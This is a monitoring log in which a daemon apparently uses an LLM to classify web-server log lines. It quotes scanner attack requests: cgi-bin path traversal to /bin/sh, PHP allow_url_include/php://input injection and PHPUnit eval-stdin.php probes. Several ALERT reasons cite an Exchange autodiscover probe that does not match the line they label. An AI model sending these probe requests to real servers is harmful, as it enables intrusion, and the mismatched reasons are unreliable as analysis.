Mar 20 15:37:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:37:09.768208 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 on root path from an unusual client string and highly variable user-agent indicates a possible probe or malformed request pattern typical of scanners. Line=2026-03-20T15:37:09.767912938Z 43.157.156.190 - - [20/Mar/2026:15:37:09 +0000] "54.200.221.0" "GET / HTTP/1.1" 400 248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.1...
Mar 20 15:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:37:31.940077 [observer] Pipeline: processed=7386 pattern_hits=6706 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:37:31.940105 [observer] Patterns: hash=6692 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:38:01.952845 [observer] Pipeline: processed=7390 pattern_hits=6710 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:38:01.952883 [observer] Patterns: hash=6696 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:38:31.950760 [observer] Pipeline: processed=7392 pattern_hits=6712 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:38:31.950794 [observer] Patterns: hash=6698 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:39:02.020641 [observer] Pipeline: processed=7394 pattern_hits=6714 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:39:02.020670 [observer] Patterns: hash=6700 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:39:31.938640 [observer] Pipeline: processed=7400 pattern_hits=6720 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:39:31.938666 [observer] Patterns: hash=6706 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:40:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:40:02.015583 [observer] Pipeline: processed=7402 pattern_hits=6722 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:40:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:40:02.015744 [observer] Patterns: hash=6708 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:40:31.942317 [observer] Pipeline: processed=7406 pattern_hits=6726 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:40:31.942351 [observer] Patterns: hash=6712 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:41:01.952418 [observer] Pipeline: processed=7408 pattern_hits=6728 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:41:01.952441 [observer] Patterns: hash=6714 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:41:31.939695 [observer] Pipeline: processed=7412 pattern_hits=6732 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:41:31.939731 [observer] Patterns: hash=6718 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:42:01.954106 [observer] Pipeline: processed=7414 pattern_hits=6734 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:42:01.954137 [observer] Patterns: hash=6720 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:42:31.954277 [observer] Pipeline: processed=7416 pattern_hits=6736 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:42:31.954305 [observer] Patterns: hash=6722 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:43:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:43:02.040048 [observer] Pipeline: processed=7420 pattern_hits=6740 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:43:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:43:02.040082 [observer] Patterns: hash=6726 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:43:31.949665 [observer] Pipeline: processed=7422 pattern_hits=6742 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:43:31.949700 [observer] Patterns: hash=6728 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:44:01.969752 [observer] Pipeline: processed=7426 pattern_hits=6746 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:44:01.969793 [observer] Patterns: hash=6732 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:44:31.938586 [observer] Pipeline: processed=7430 pattern_hits=6750 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:44:31.938619 [observer] Patterns: hash=6736 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:45:01.951556 [observer] Pipeline: processed=7434 pattern_hits=6754 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:45:01.951587 [observer] Patterns: hash=6740 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:45:31.949410 [observer] Pipeline: processed=7436 pattern_hits=6756 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:45:31.949444 [observer] Patterns: hash=6742 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:01.984071 [observer] Pipeline: processed=7438 pattern_hits=6758 llm_calls=680 llm_errors=4 learned=6
Mar 20 15:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:01.984109 [observer] Patterns: hash=6744 prefix=14 regex=0 contains=0 deny=127 alert=844 suppress=0 misses=680
Mar 20 15:46:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:16.969241 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access from an external IP with a CensysInspect user agent hitting the root path and issuing a redirect could indicate automated scanning or probing activity. Line=2026-03-20T15:46:16.968992472Z 144.126.229.119 - - [20/Mar/2026:15:46:16 +0000] "login.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firef...
Mar 20 15:46:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:17.295027 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access from an external IP with a CensysInspect user agent hitting the root path and issuing a redirect could indicate automated scanning or probing activity. Line=2026-03-20T15:46:17.294731421Z 144.126.229.119 - - [20/Mar/2026:15:46:17 +0000] "login.admin.kovicloud.com" "GET /favicon.ico HTTP/1.1" 302 138 "http://login.admin.kovicloud.com/" "Mozilla/5.0 (X11; L...
Mar 20 15:46:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:21.465803 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:46:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:21.465843 [analyzer] Source hint mismatch: LLM says "nginx_http_server", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:46:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:27.409766 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:46:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:27.409812 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "login.admin.kovicloud.com"
Mar 20 15:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:31.944108 [observer] Pipeline: processed=7445 pattern_hits=6762 llm_calls=683 llm_errors=4 learned=7
Mar 20 15:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:31.944145 [observer] Patterns: hash=6748 prefix=14 regex=0 contains=0 deny=127 alert=846 suppress=0 misses=683
Mar 20 15:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:34.705076 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 20 15:46:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:34.705122 [analyzer] Confidence 0.82 too low for pattern learning (need 0.85+)
Mar 20 15:46:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:38.395309 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:46:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:38.395341 [SUSPICIOUS] Source=docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 Reason=Error indicating a missing route for a common path (/robots.txt) could indicate misconfiguration or probing; not definitive malicious activity but warrants attention. Line=2026-03-20T15:46:34.757901874Z Error: No route matches URL "/robots.txt"
Mar 20 15:46:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:40.857289 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:46:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:40.857324 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 15:46:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:43.773217 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.65 action=allow pattern_type=regex
Mar 20 15:46:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:43.773250 [analyzer] Source hint mismatch: LLM says "nodejs_remix_router", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:46.274615 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:46:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:46.274655 [analyzer] Confidence 0.80 too low for pattern learning (need 0.85+)
Mar 20 15:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:47.015655 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:46:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:47.015693 [analyzer] Source hint mismatch: LLM says "nodejs/remix-router", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:50.740633 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 15:46:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:50.740666 [SUSPICIOUS] Source=docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 Reason=A stack trace line indicating a runtime exception in a Node.js Remix server path. Could indicate a failed request handling but not inherently malicious. Line=2026-03-20T15:46:34.757946480Z     at handleDocumentRequest (/app/node_modules/@remix-run/server-runtime/dist/server.js:275:35)
Mar 20 15:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:52.469857 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 15:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:52.469896 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 15:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:52.864043 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:46:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:52.864077 [analyzer] Source hint mismatch: LLM says "node_request_handler", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:58.428978 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 15:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:58.429178 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+)
Mar 20 15:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:58.588613 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:46:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:46:58.588653 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "login.admin.kovicloud.com"
Mar 20 15:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:01.711762 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 20 15:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:01.711801 [analyzer] Source hint mismatch: LLM says "nginx_http_server", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:01.972567 [observer] Pipeline: processed=7462 pattern_hits=6766 llm_calls=696 llm_errors=4 learned=8
Mar 20 15:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:01.972641 [observer] Patterns: hash=6752 prefix=14 regex=0 contains=0 deny=127 alert=846 suppress=0 misses=696
Mar 20 15:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:04.969525 [analyzer] LLM verdict for docker:srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:47:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:04.969568 [analyzer] Source hint mismatch: LLM says "web_server", actual is "srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42" — skipping pattern
Mar 20 15:47:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:10.006581 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 15:47:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:10.006626 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 15:47:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:15.438351 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:47:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:15.438392 [analyzer] Confidence 0.80 too low for pattern learning (need 0.85+)
Mar 20 15:47:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:23.407882 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:47:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:23.407921 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 15:47:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:29.075758 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:47:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:29.075802 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 15:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:31.939292 [observer] Pipeline: processed=7467 pattern_hits=6767 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:31.939315 [observer] Patterns: hash=6753 prefix=14 regex=0 contains=0 deny=127 alert=846 suppress=0 misses=700
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935245 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935288 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935469 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T15:47:13.284666927Z 115.191.6.5 - - [20/Mar/2026:15:47:13 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935580 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T15:47:30.416203394Z 115.191.6.5 - - [20/Mar/2026:15:47:30 +0000] "_" "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/...
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935659 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Log shows an nginx error about a missing file and a request containing php://input and allow_url_include indicators, which are common in attempted PHP code injection/path traversal attacks. Line=2026-03-20T15:47:33.446142235Z 2026/03/20 15:47:33 [error] 422#422: *755886 open() "/usr/share/nginx/default/hello.world" failed (2: No such file or directory), client: 115.191.6.5, server: _, request...
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935684 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:33.446218342Z 115.191.6.5 - - [20/Mar/2026:15:47:33 +0000] "54.200.221.0" "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 2401 "-" "li...
Mar 20 15:47:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:35.935713 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on a POST with a suspicious query attempting PHP wrappers suggests an injection/exploitation attempt targeted at PHP config. Likely malicious probe. Line=2026-03-20T15:47:35.003081429Z 115.191.6.5 - - [20/Mar/2026:15:47:35 +0000] "54.200.221.0" "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 405 150 "-" "libredtail-htt...
Mar 20 15:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:37.253749 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to a likely PHPUnit path under nginx suggests probing for vulnerable PHP code paths. The file does not exist, but the pattern is a known reconnaissance/attack vector. Line=2026-03-20T15:47:37.253432423Z 2026/03/20 15:47:37 [error] 422#422: *755886 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), ...
Mar 20 15:47:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:37.253799 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:37.253534902Z 115.191.6.5 - - [20/Mar/2026:15:47:37 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 15:47:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:41.605722 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=External client attempting to access a suspicious PHP unit file path (vendor/phpunit/phpunit/Util/PHP/eval-stdin.php) on an nginx server. This mirrors common probing for phpunit vulnerabilities. Line=2026-03-20T15:47:41.605398021Z 2026/03/20 15:47:41 [error] 422#422: *755886 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), clie...
Mar 20 15:47:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:41.605781 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:41.605473294Z 115.191.6.5 - - [20/Mar/2026:15:47:41 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 15:47:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:44.578607 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access attempt to PHP Unit vendor path (eval-stdin.php) commonly used in exploit scans against phpunit; unusual path request indicating potential probe for RCE. Line=2026-03-20T15:47:44.578341549Z 2026/03/20 15:47:44 [error] 422#422: *755886 open() "/usr/share/nginx/default/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: ...
Mar 20 15:47:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:44.578686 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:44.578528641Z 115.191.6.5 - - [20/Mar/2026:15:47:44 +0000] "54.200.221.0" "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 15:47:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:48.517810 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request attempting to access a phpunit evaluation script (eval-stdin.php) which is a common probe for RCE/PII via PHP unit; file not found but indicative of exploitation attempt. Line=2026-03-20T15:47:48.517382599Z 2026/03/20 15:47:48 [error] 422#422: *755886 open() "/usr/share/nginx/default/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 115....
Mar 20 15:47:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:48.517869 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:48.517512536Z 115.191.6.5 - - [20/Mar/2026:15:47:48 +0000] "54.200.221.0" "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 15:47:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:56.517508 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Accessing a phpunit license path under vendor suggests probing for phpunit in web root, a common web exploit pattern to locate vulnerable components. Line=2026-03-20T15:47:56.517231654Z 2026/03/20 15:47:56 [error] 422#422: *755886 open() "/usr/share/nginx/default/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), clien...
Mar 20 15:47:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:47:56.517573 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T15:47:56.517364073Z 115.191.6.5 - - [20/Mar/2026:15:47:56 +0000] "54.200.221.0" "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 2401 "-" "libredtail-http" "-"
Mar 20 15:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:48:01.953232 [observer] Pipeline: processed=7488 pattern_hits=6788 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:48:01.953258 [observer] Patterns: hash=6774 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:48:31.940616 [observer] Pipeline: processed=7492 pattern_hits=6792 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:48:31.940645 [observer] Patterns: hash=6778 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:49:01.978709 [observer] Pipeline: processed=7494 pattern_hits=6794 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:49:01.978740 [observer] Patterns: hash=6780 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:49:31.949086 [observer] Pipeline: processed=7498 pattern_hits=6798 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:49:31.949116 [observer] Patterns: hash=6784 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:50:01.967434 [observer] Pipeline: processed=7502 pattern_hits=6802 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:50:01.967465 [observer] Patterns: hash=6788 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
Mar 20 15:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:50:31.948085 [observer] Pipeline: processed=7504 pattern_hits=6804 llm_calls=700 llm_errors=4 learned=8
Mar 20 15:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:50:31.948112 [observer] Patterns: hash=6790 prefix=14 regex=0 contains=0 deny=134 alert=854 suppress=0 misses=700
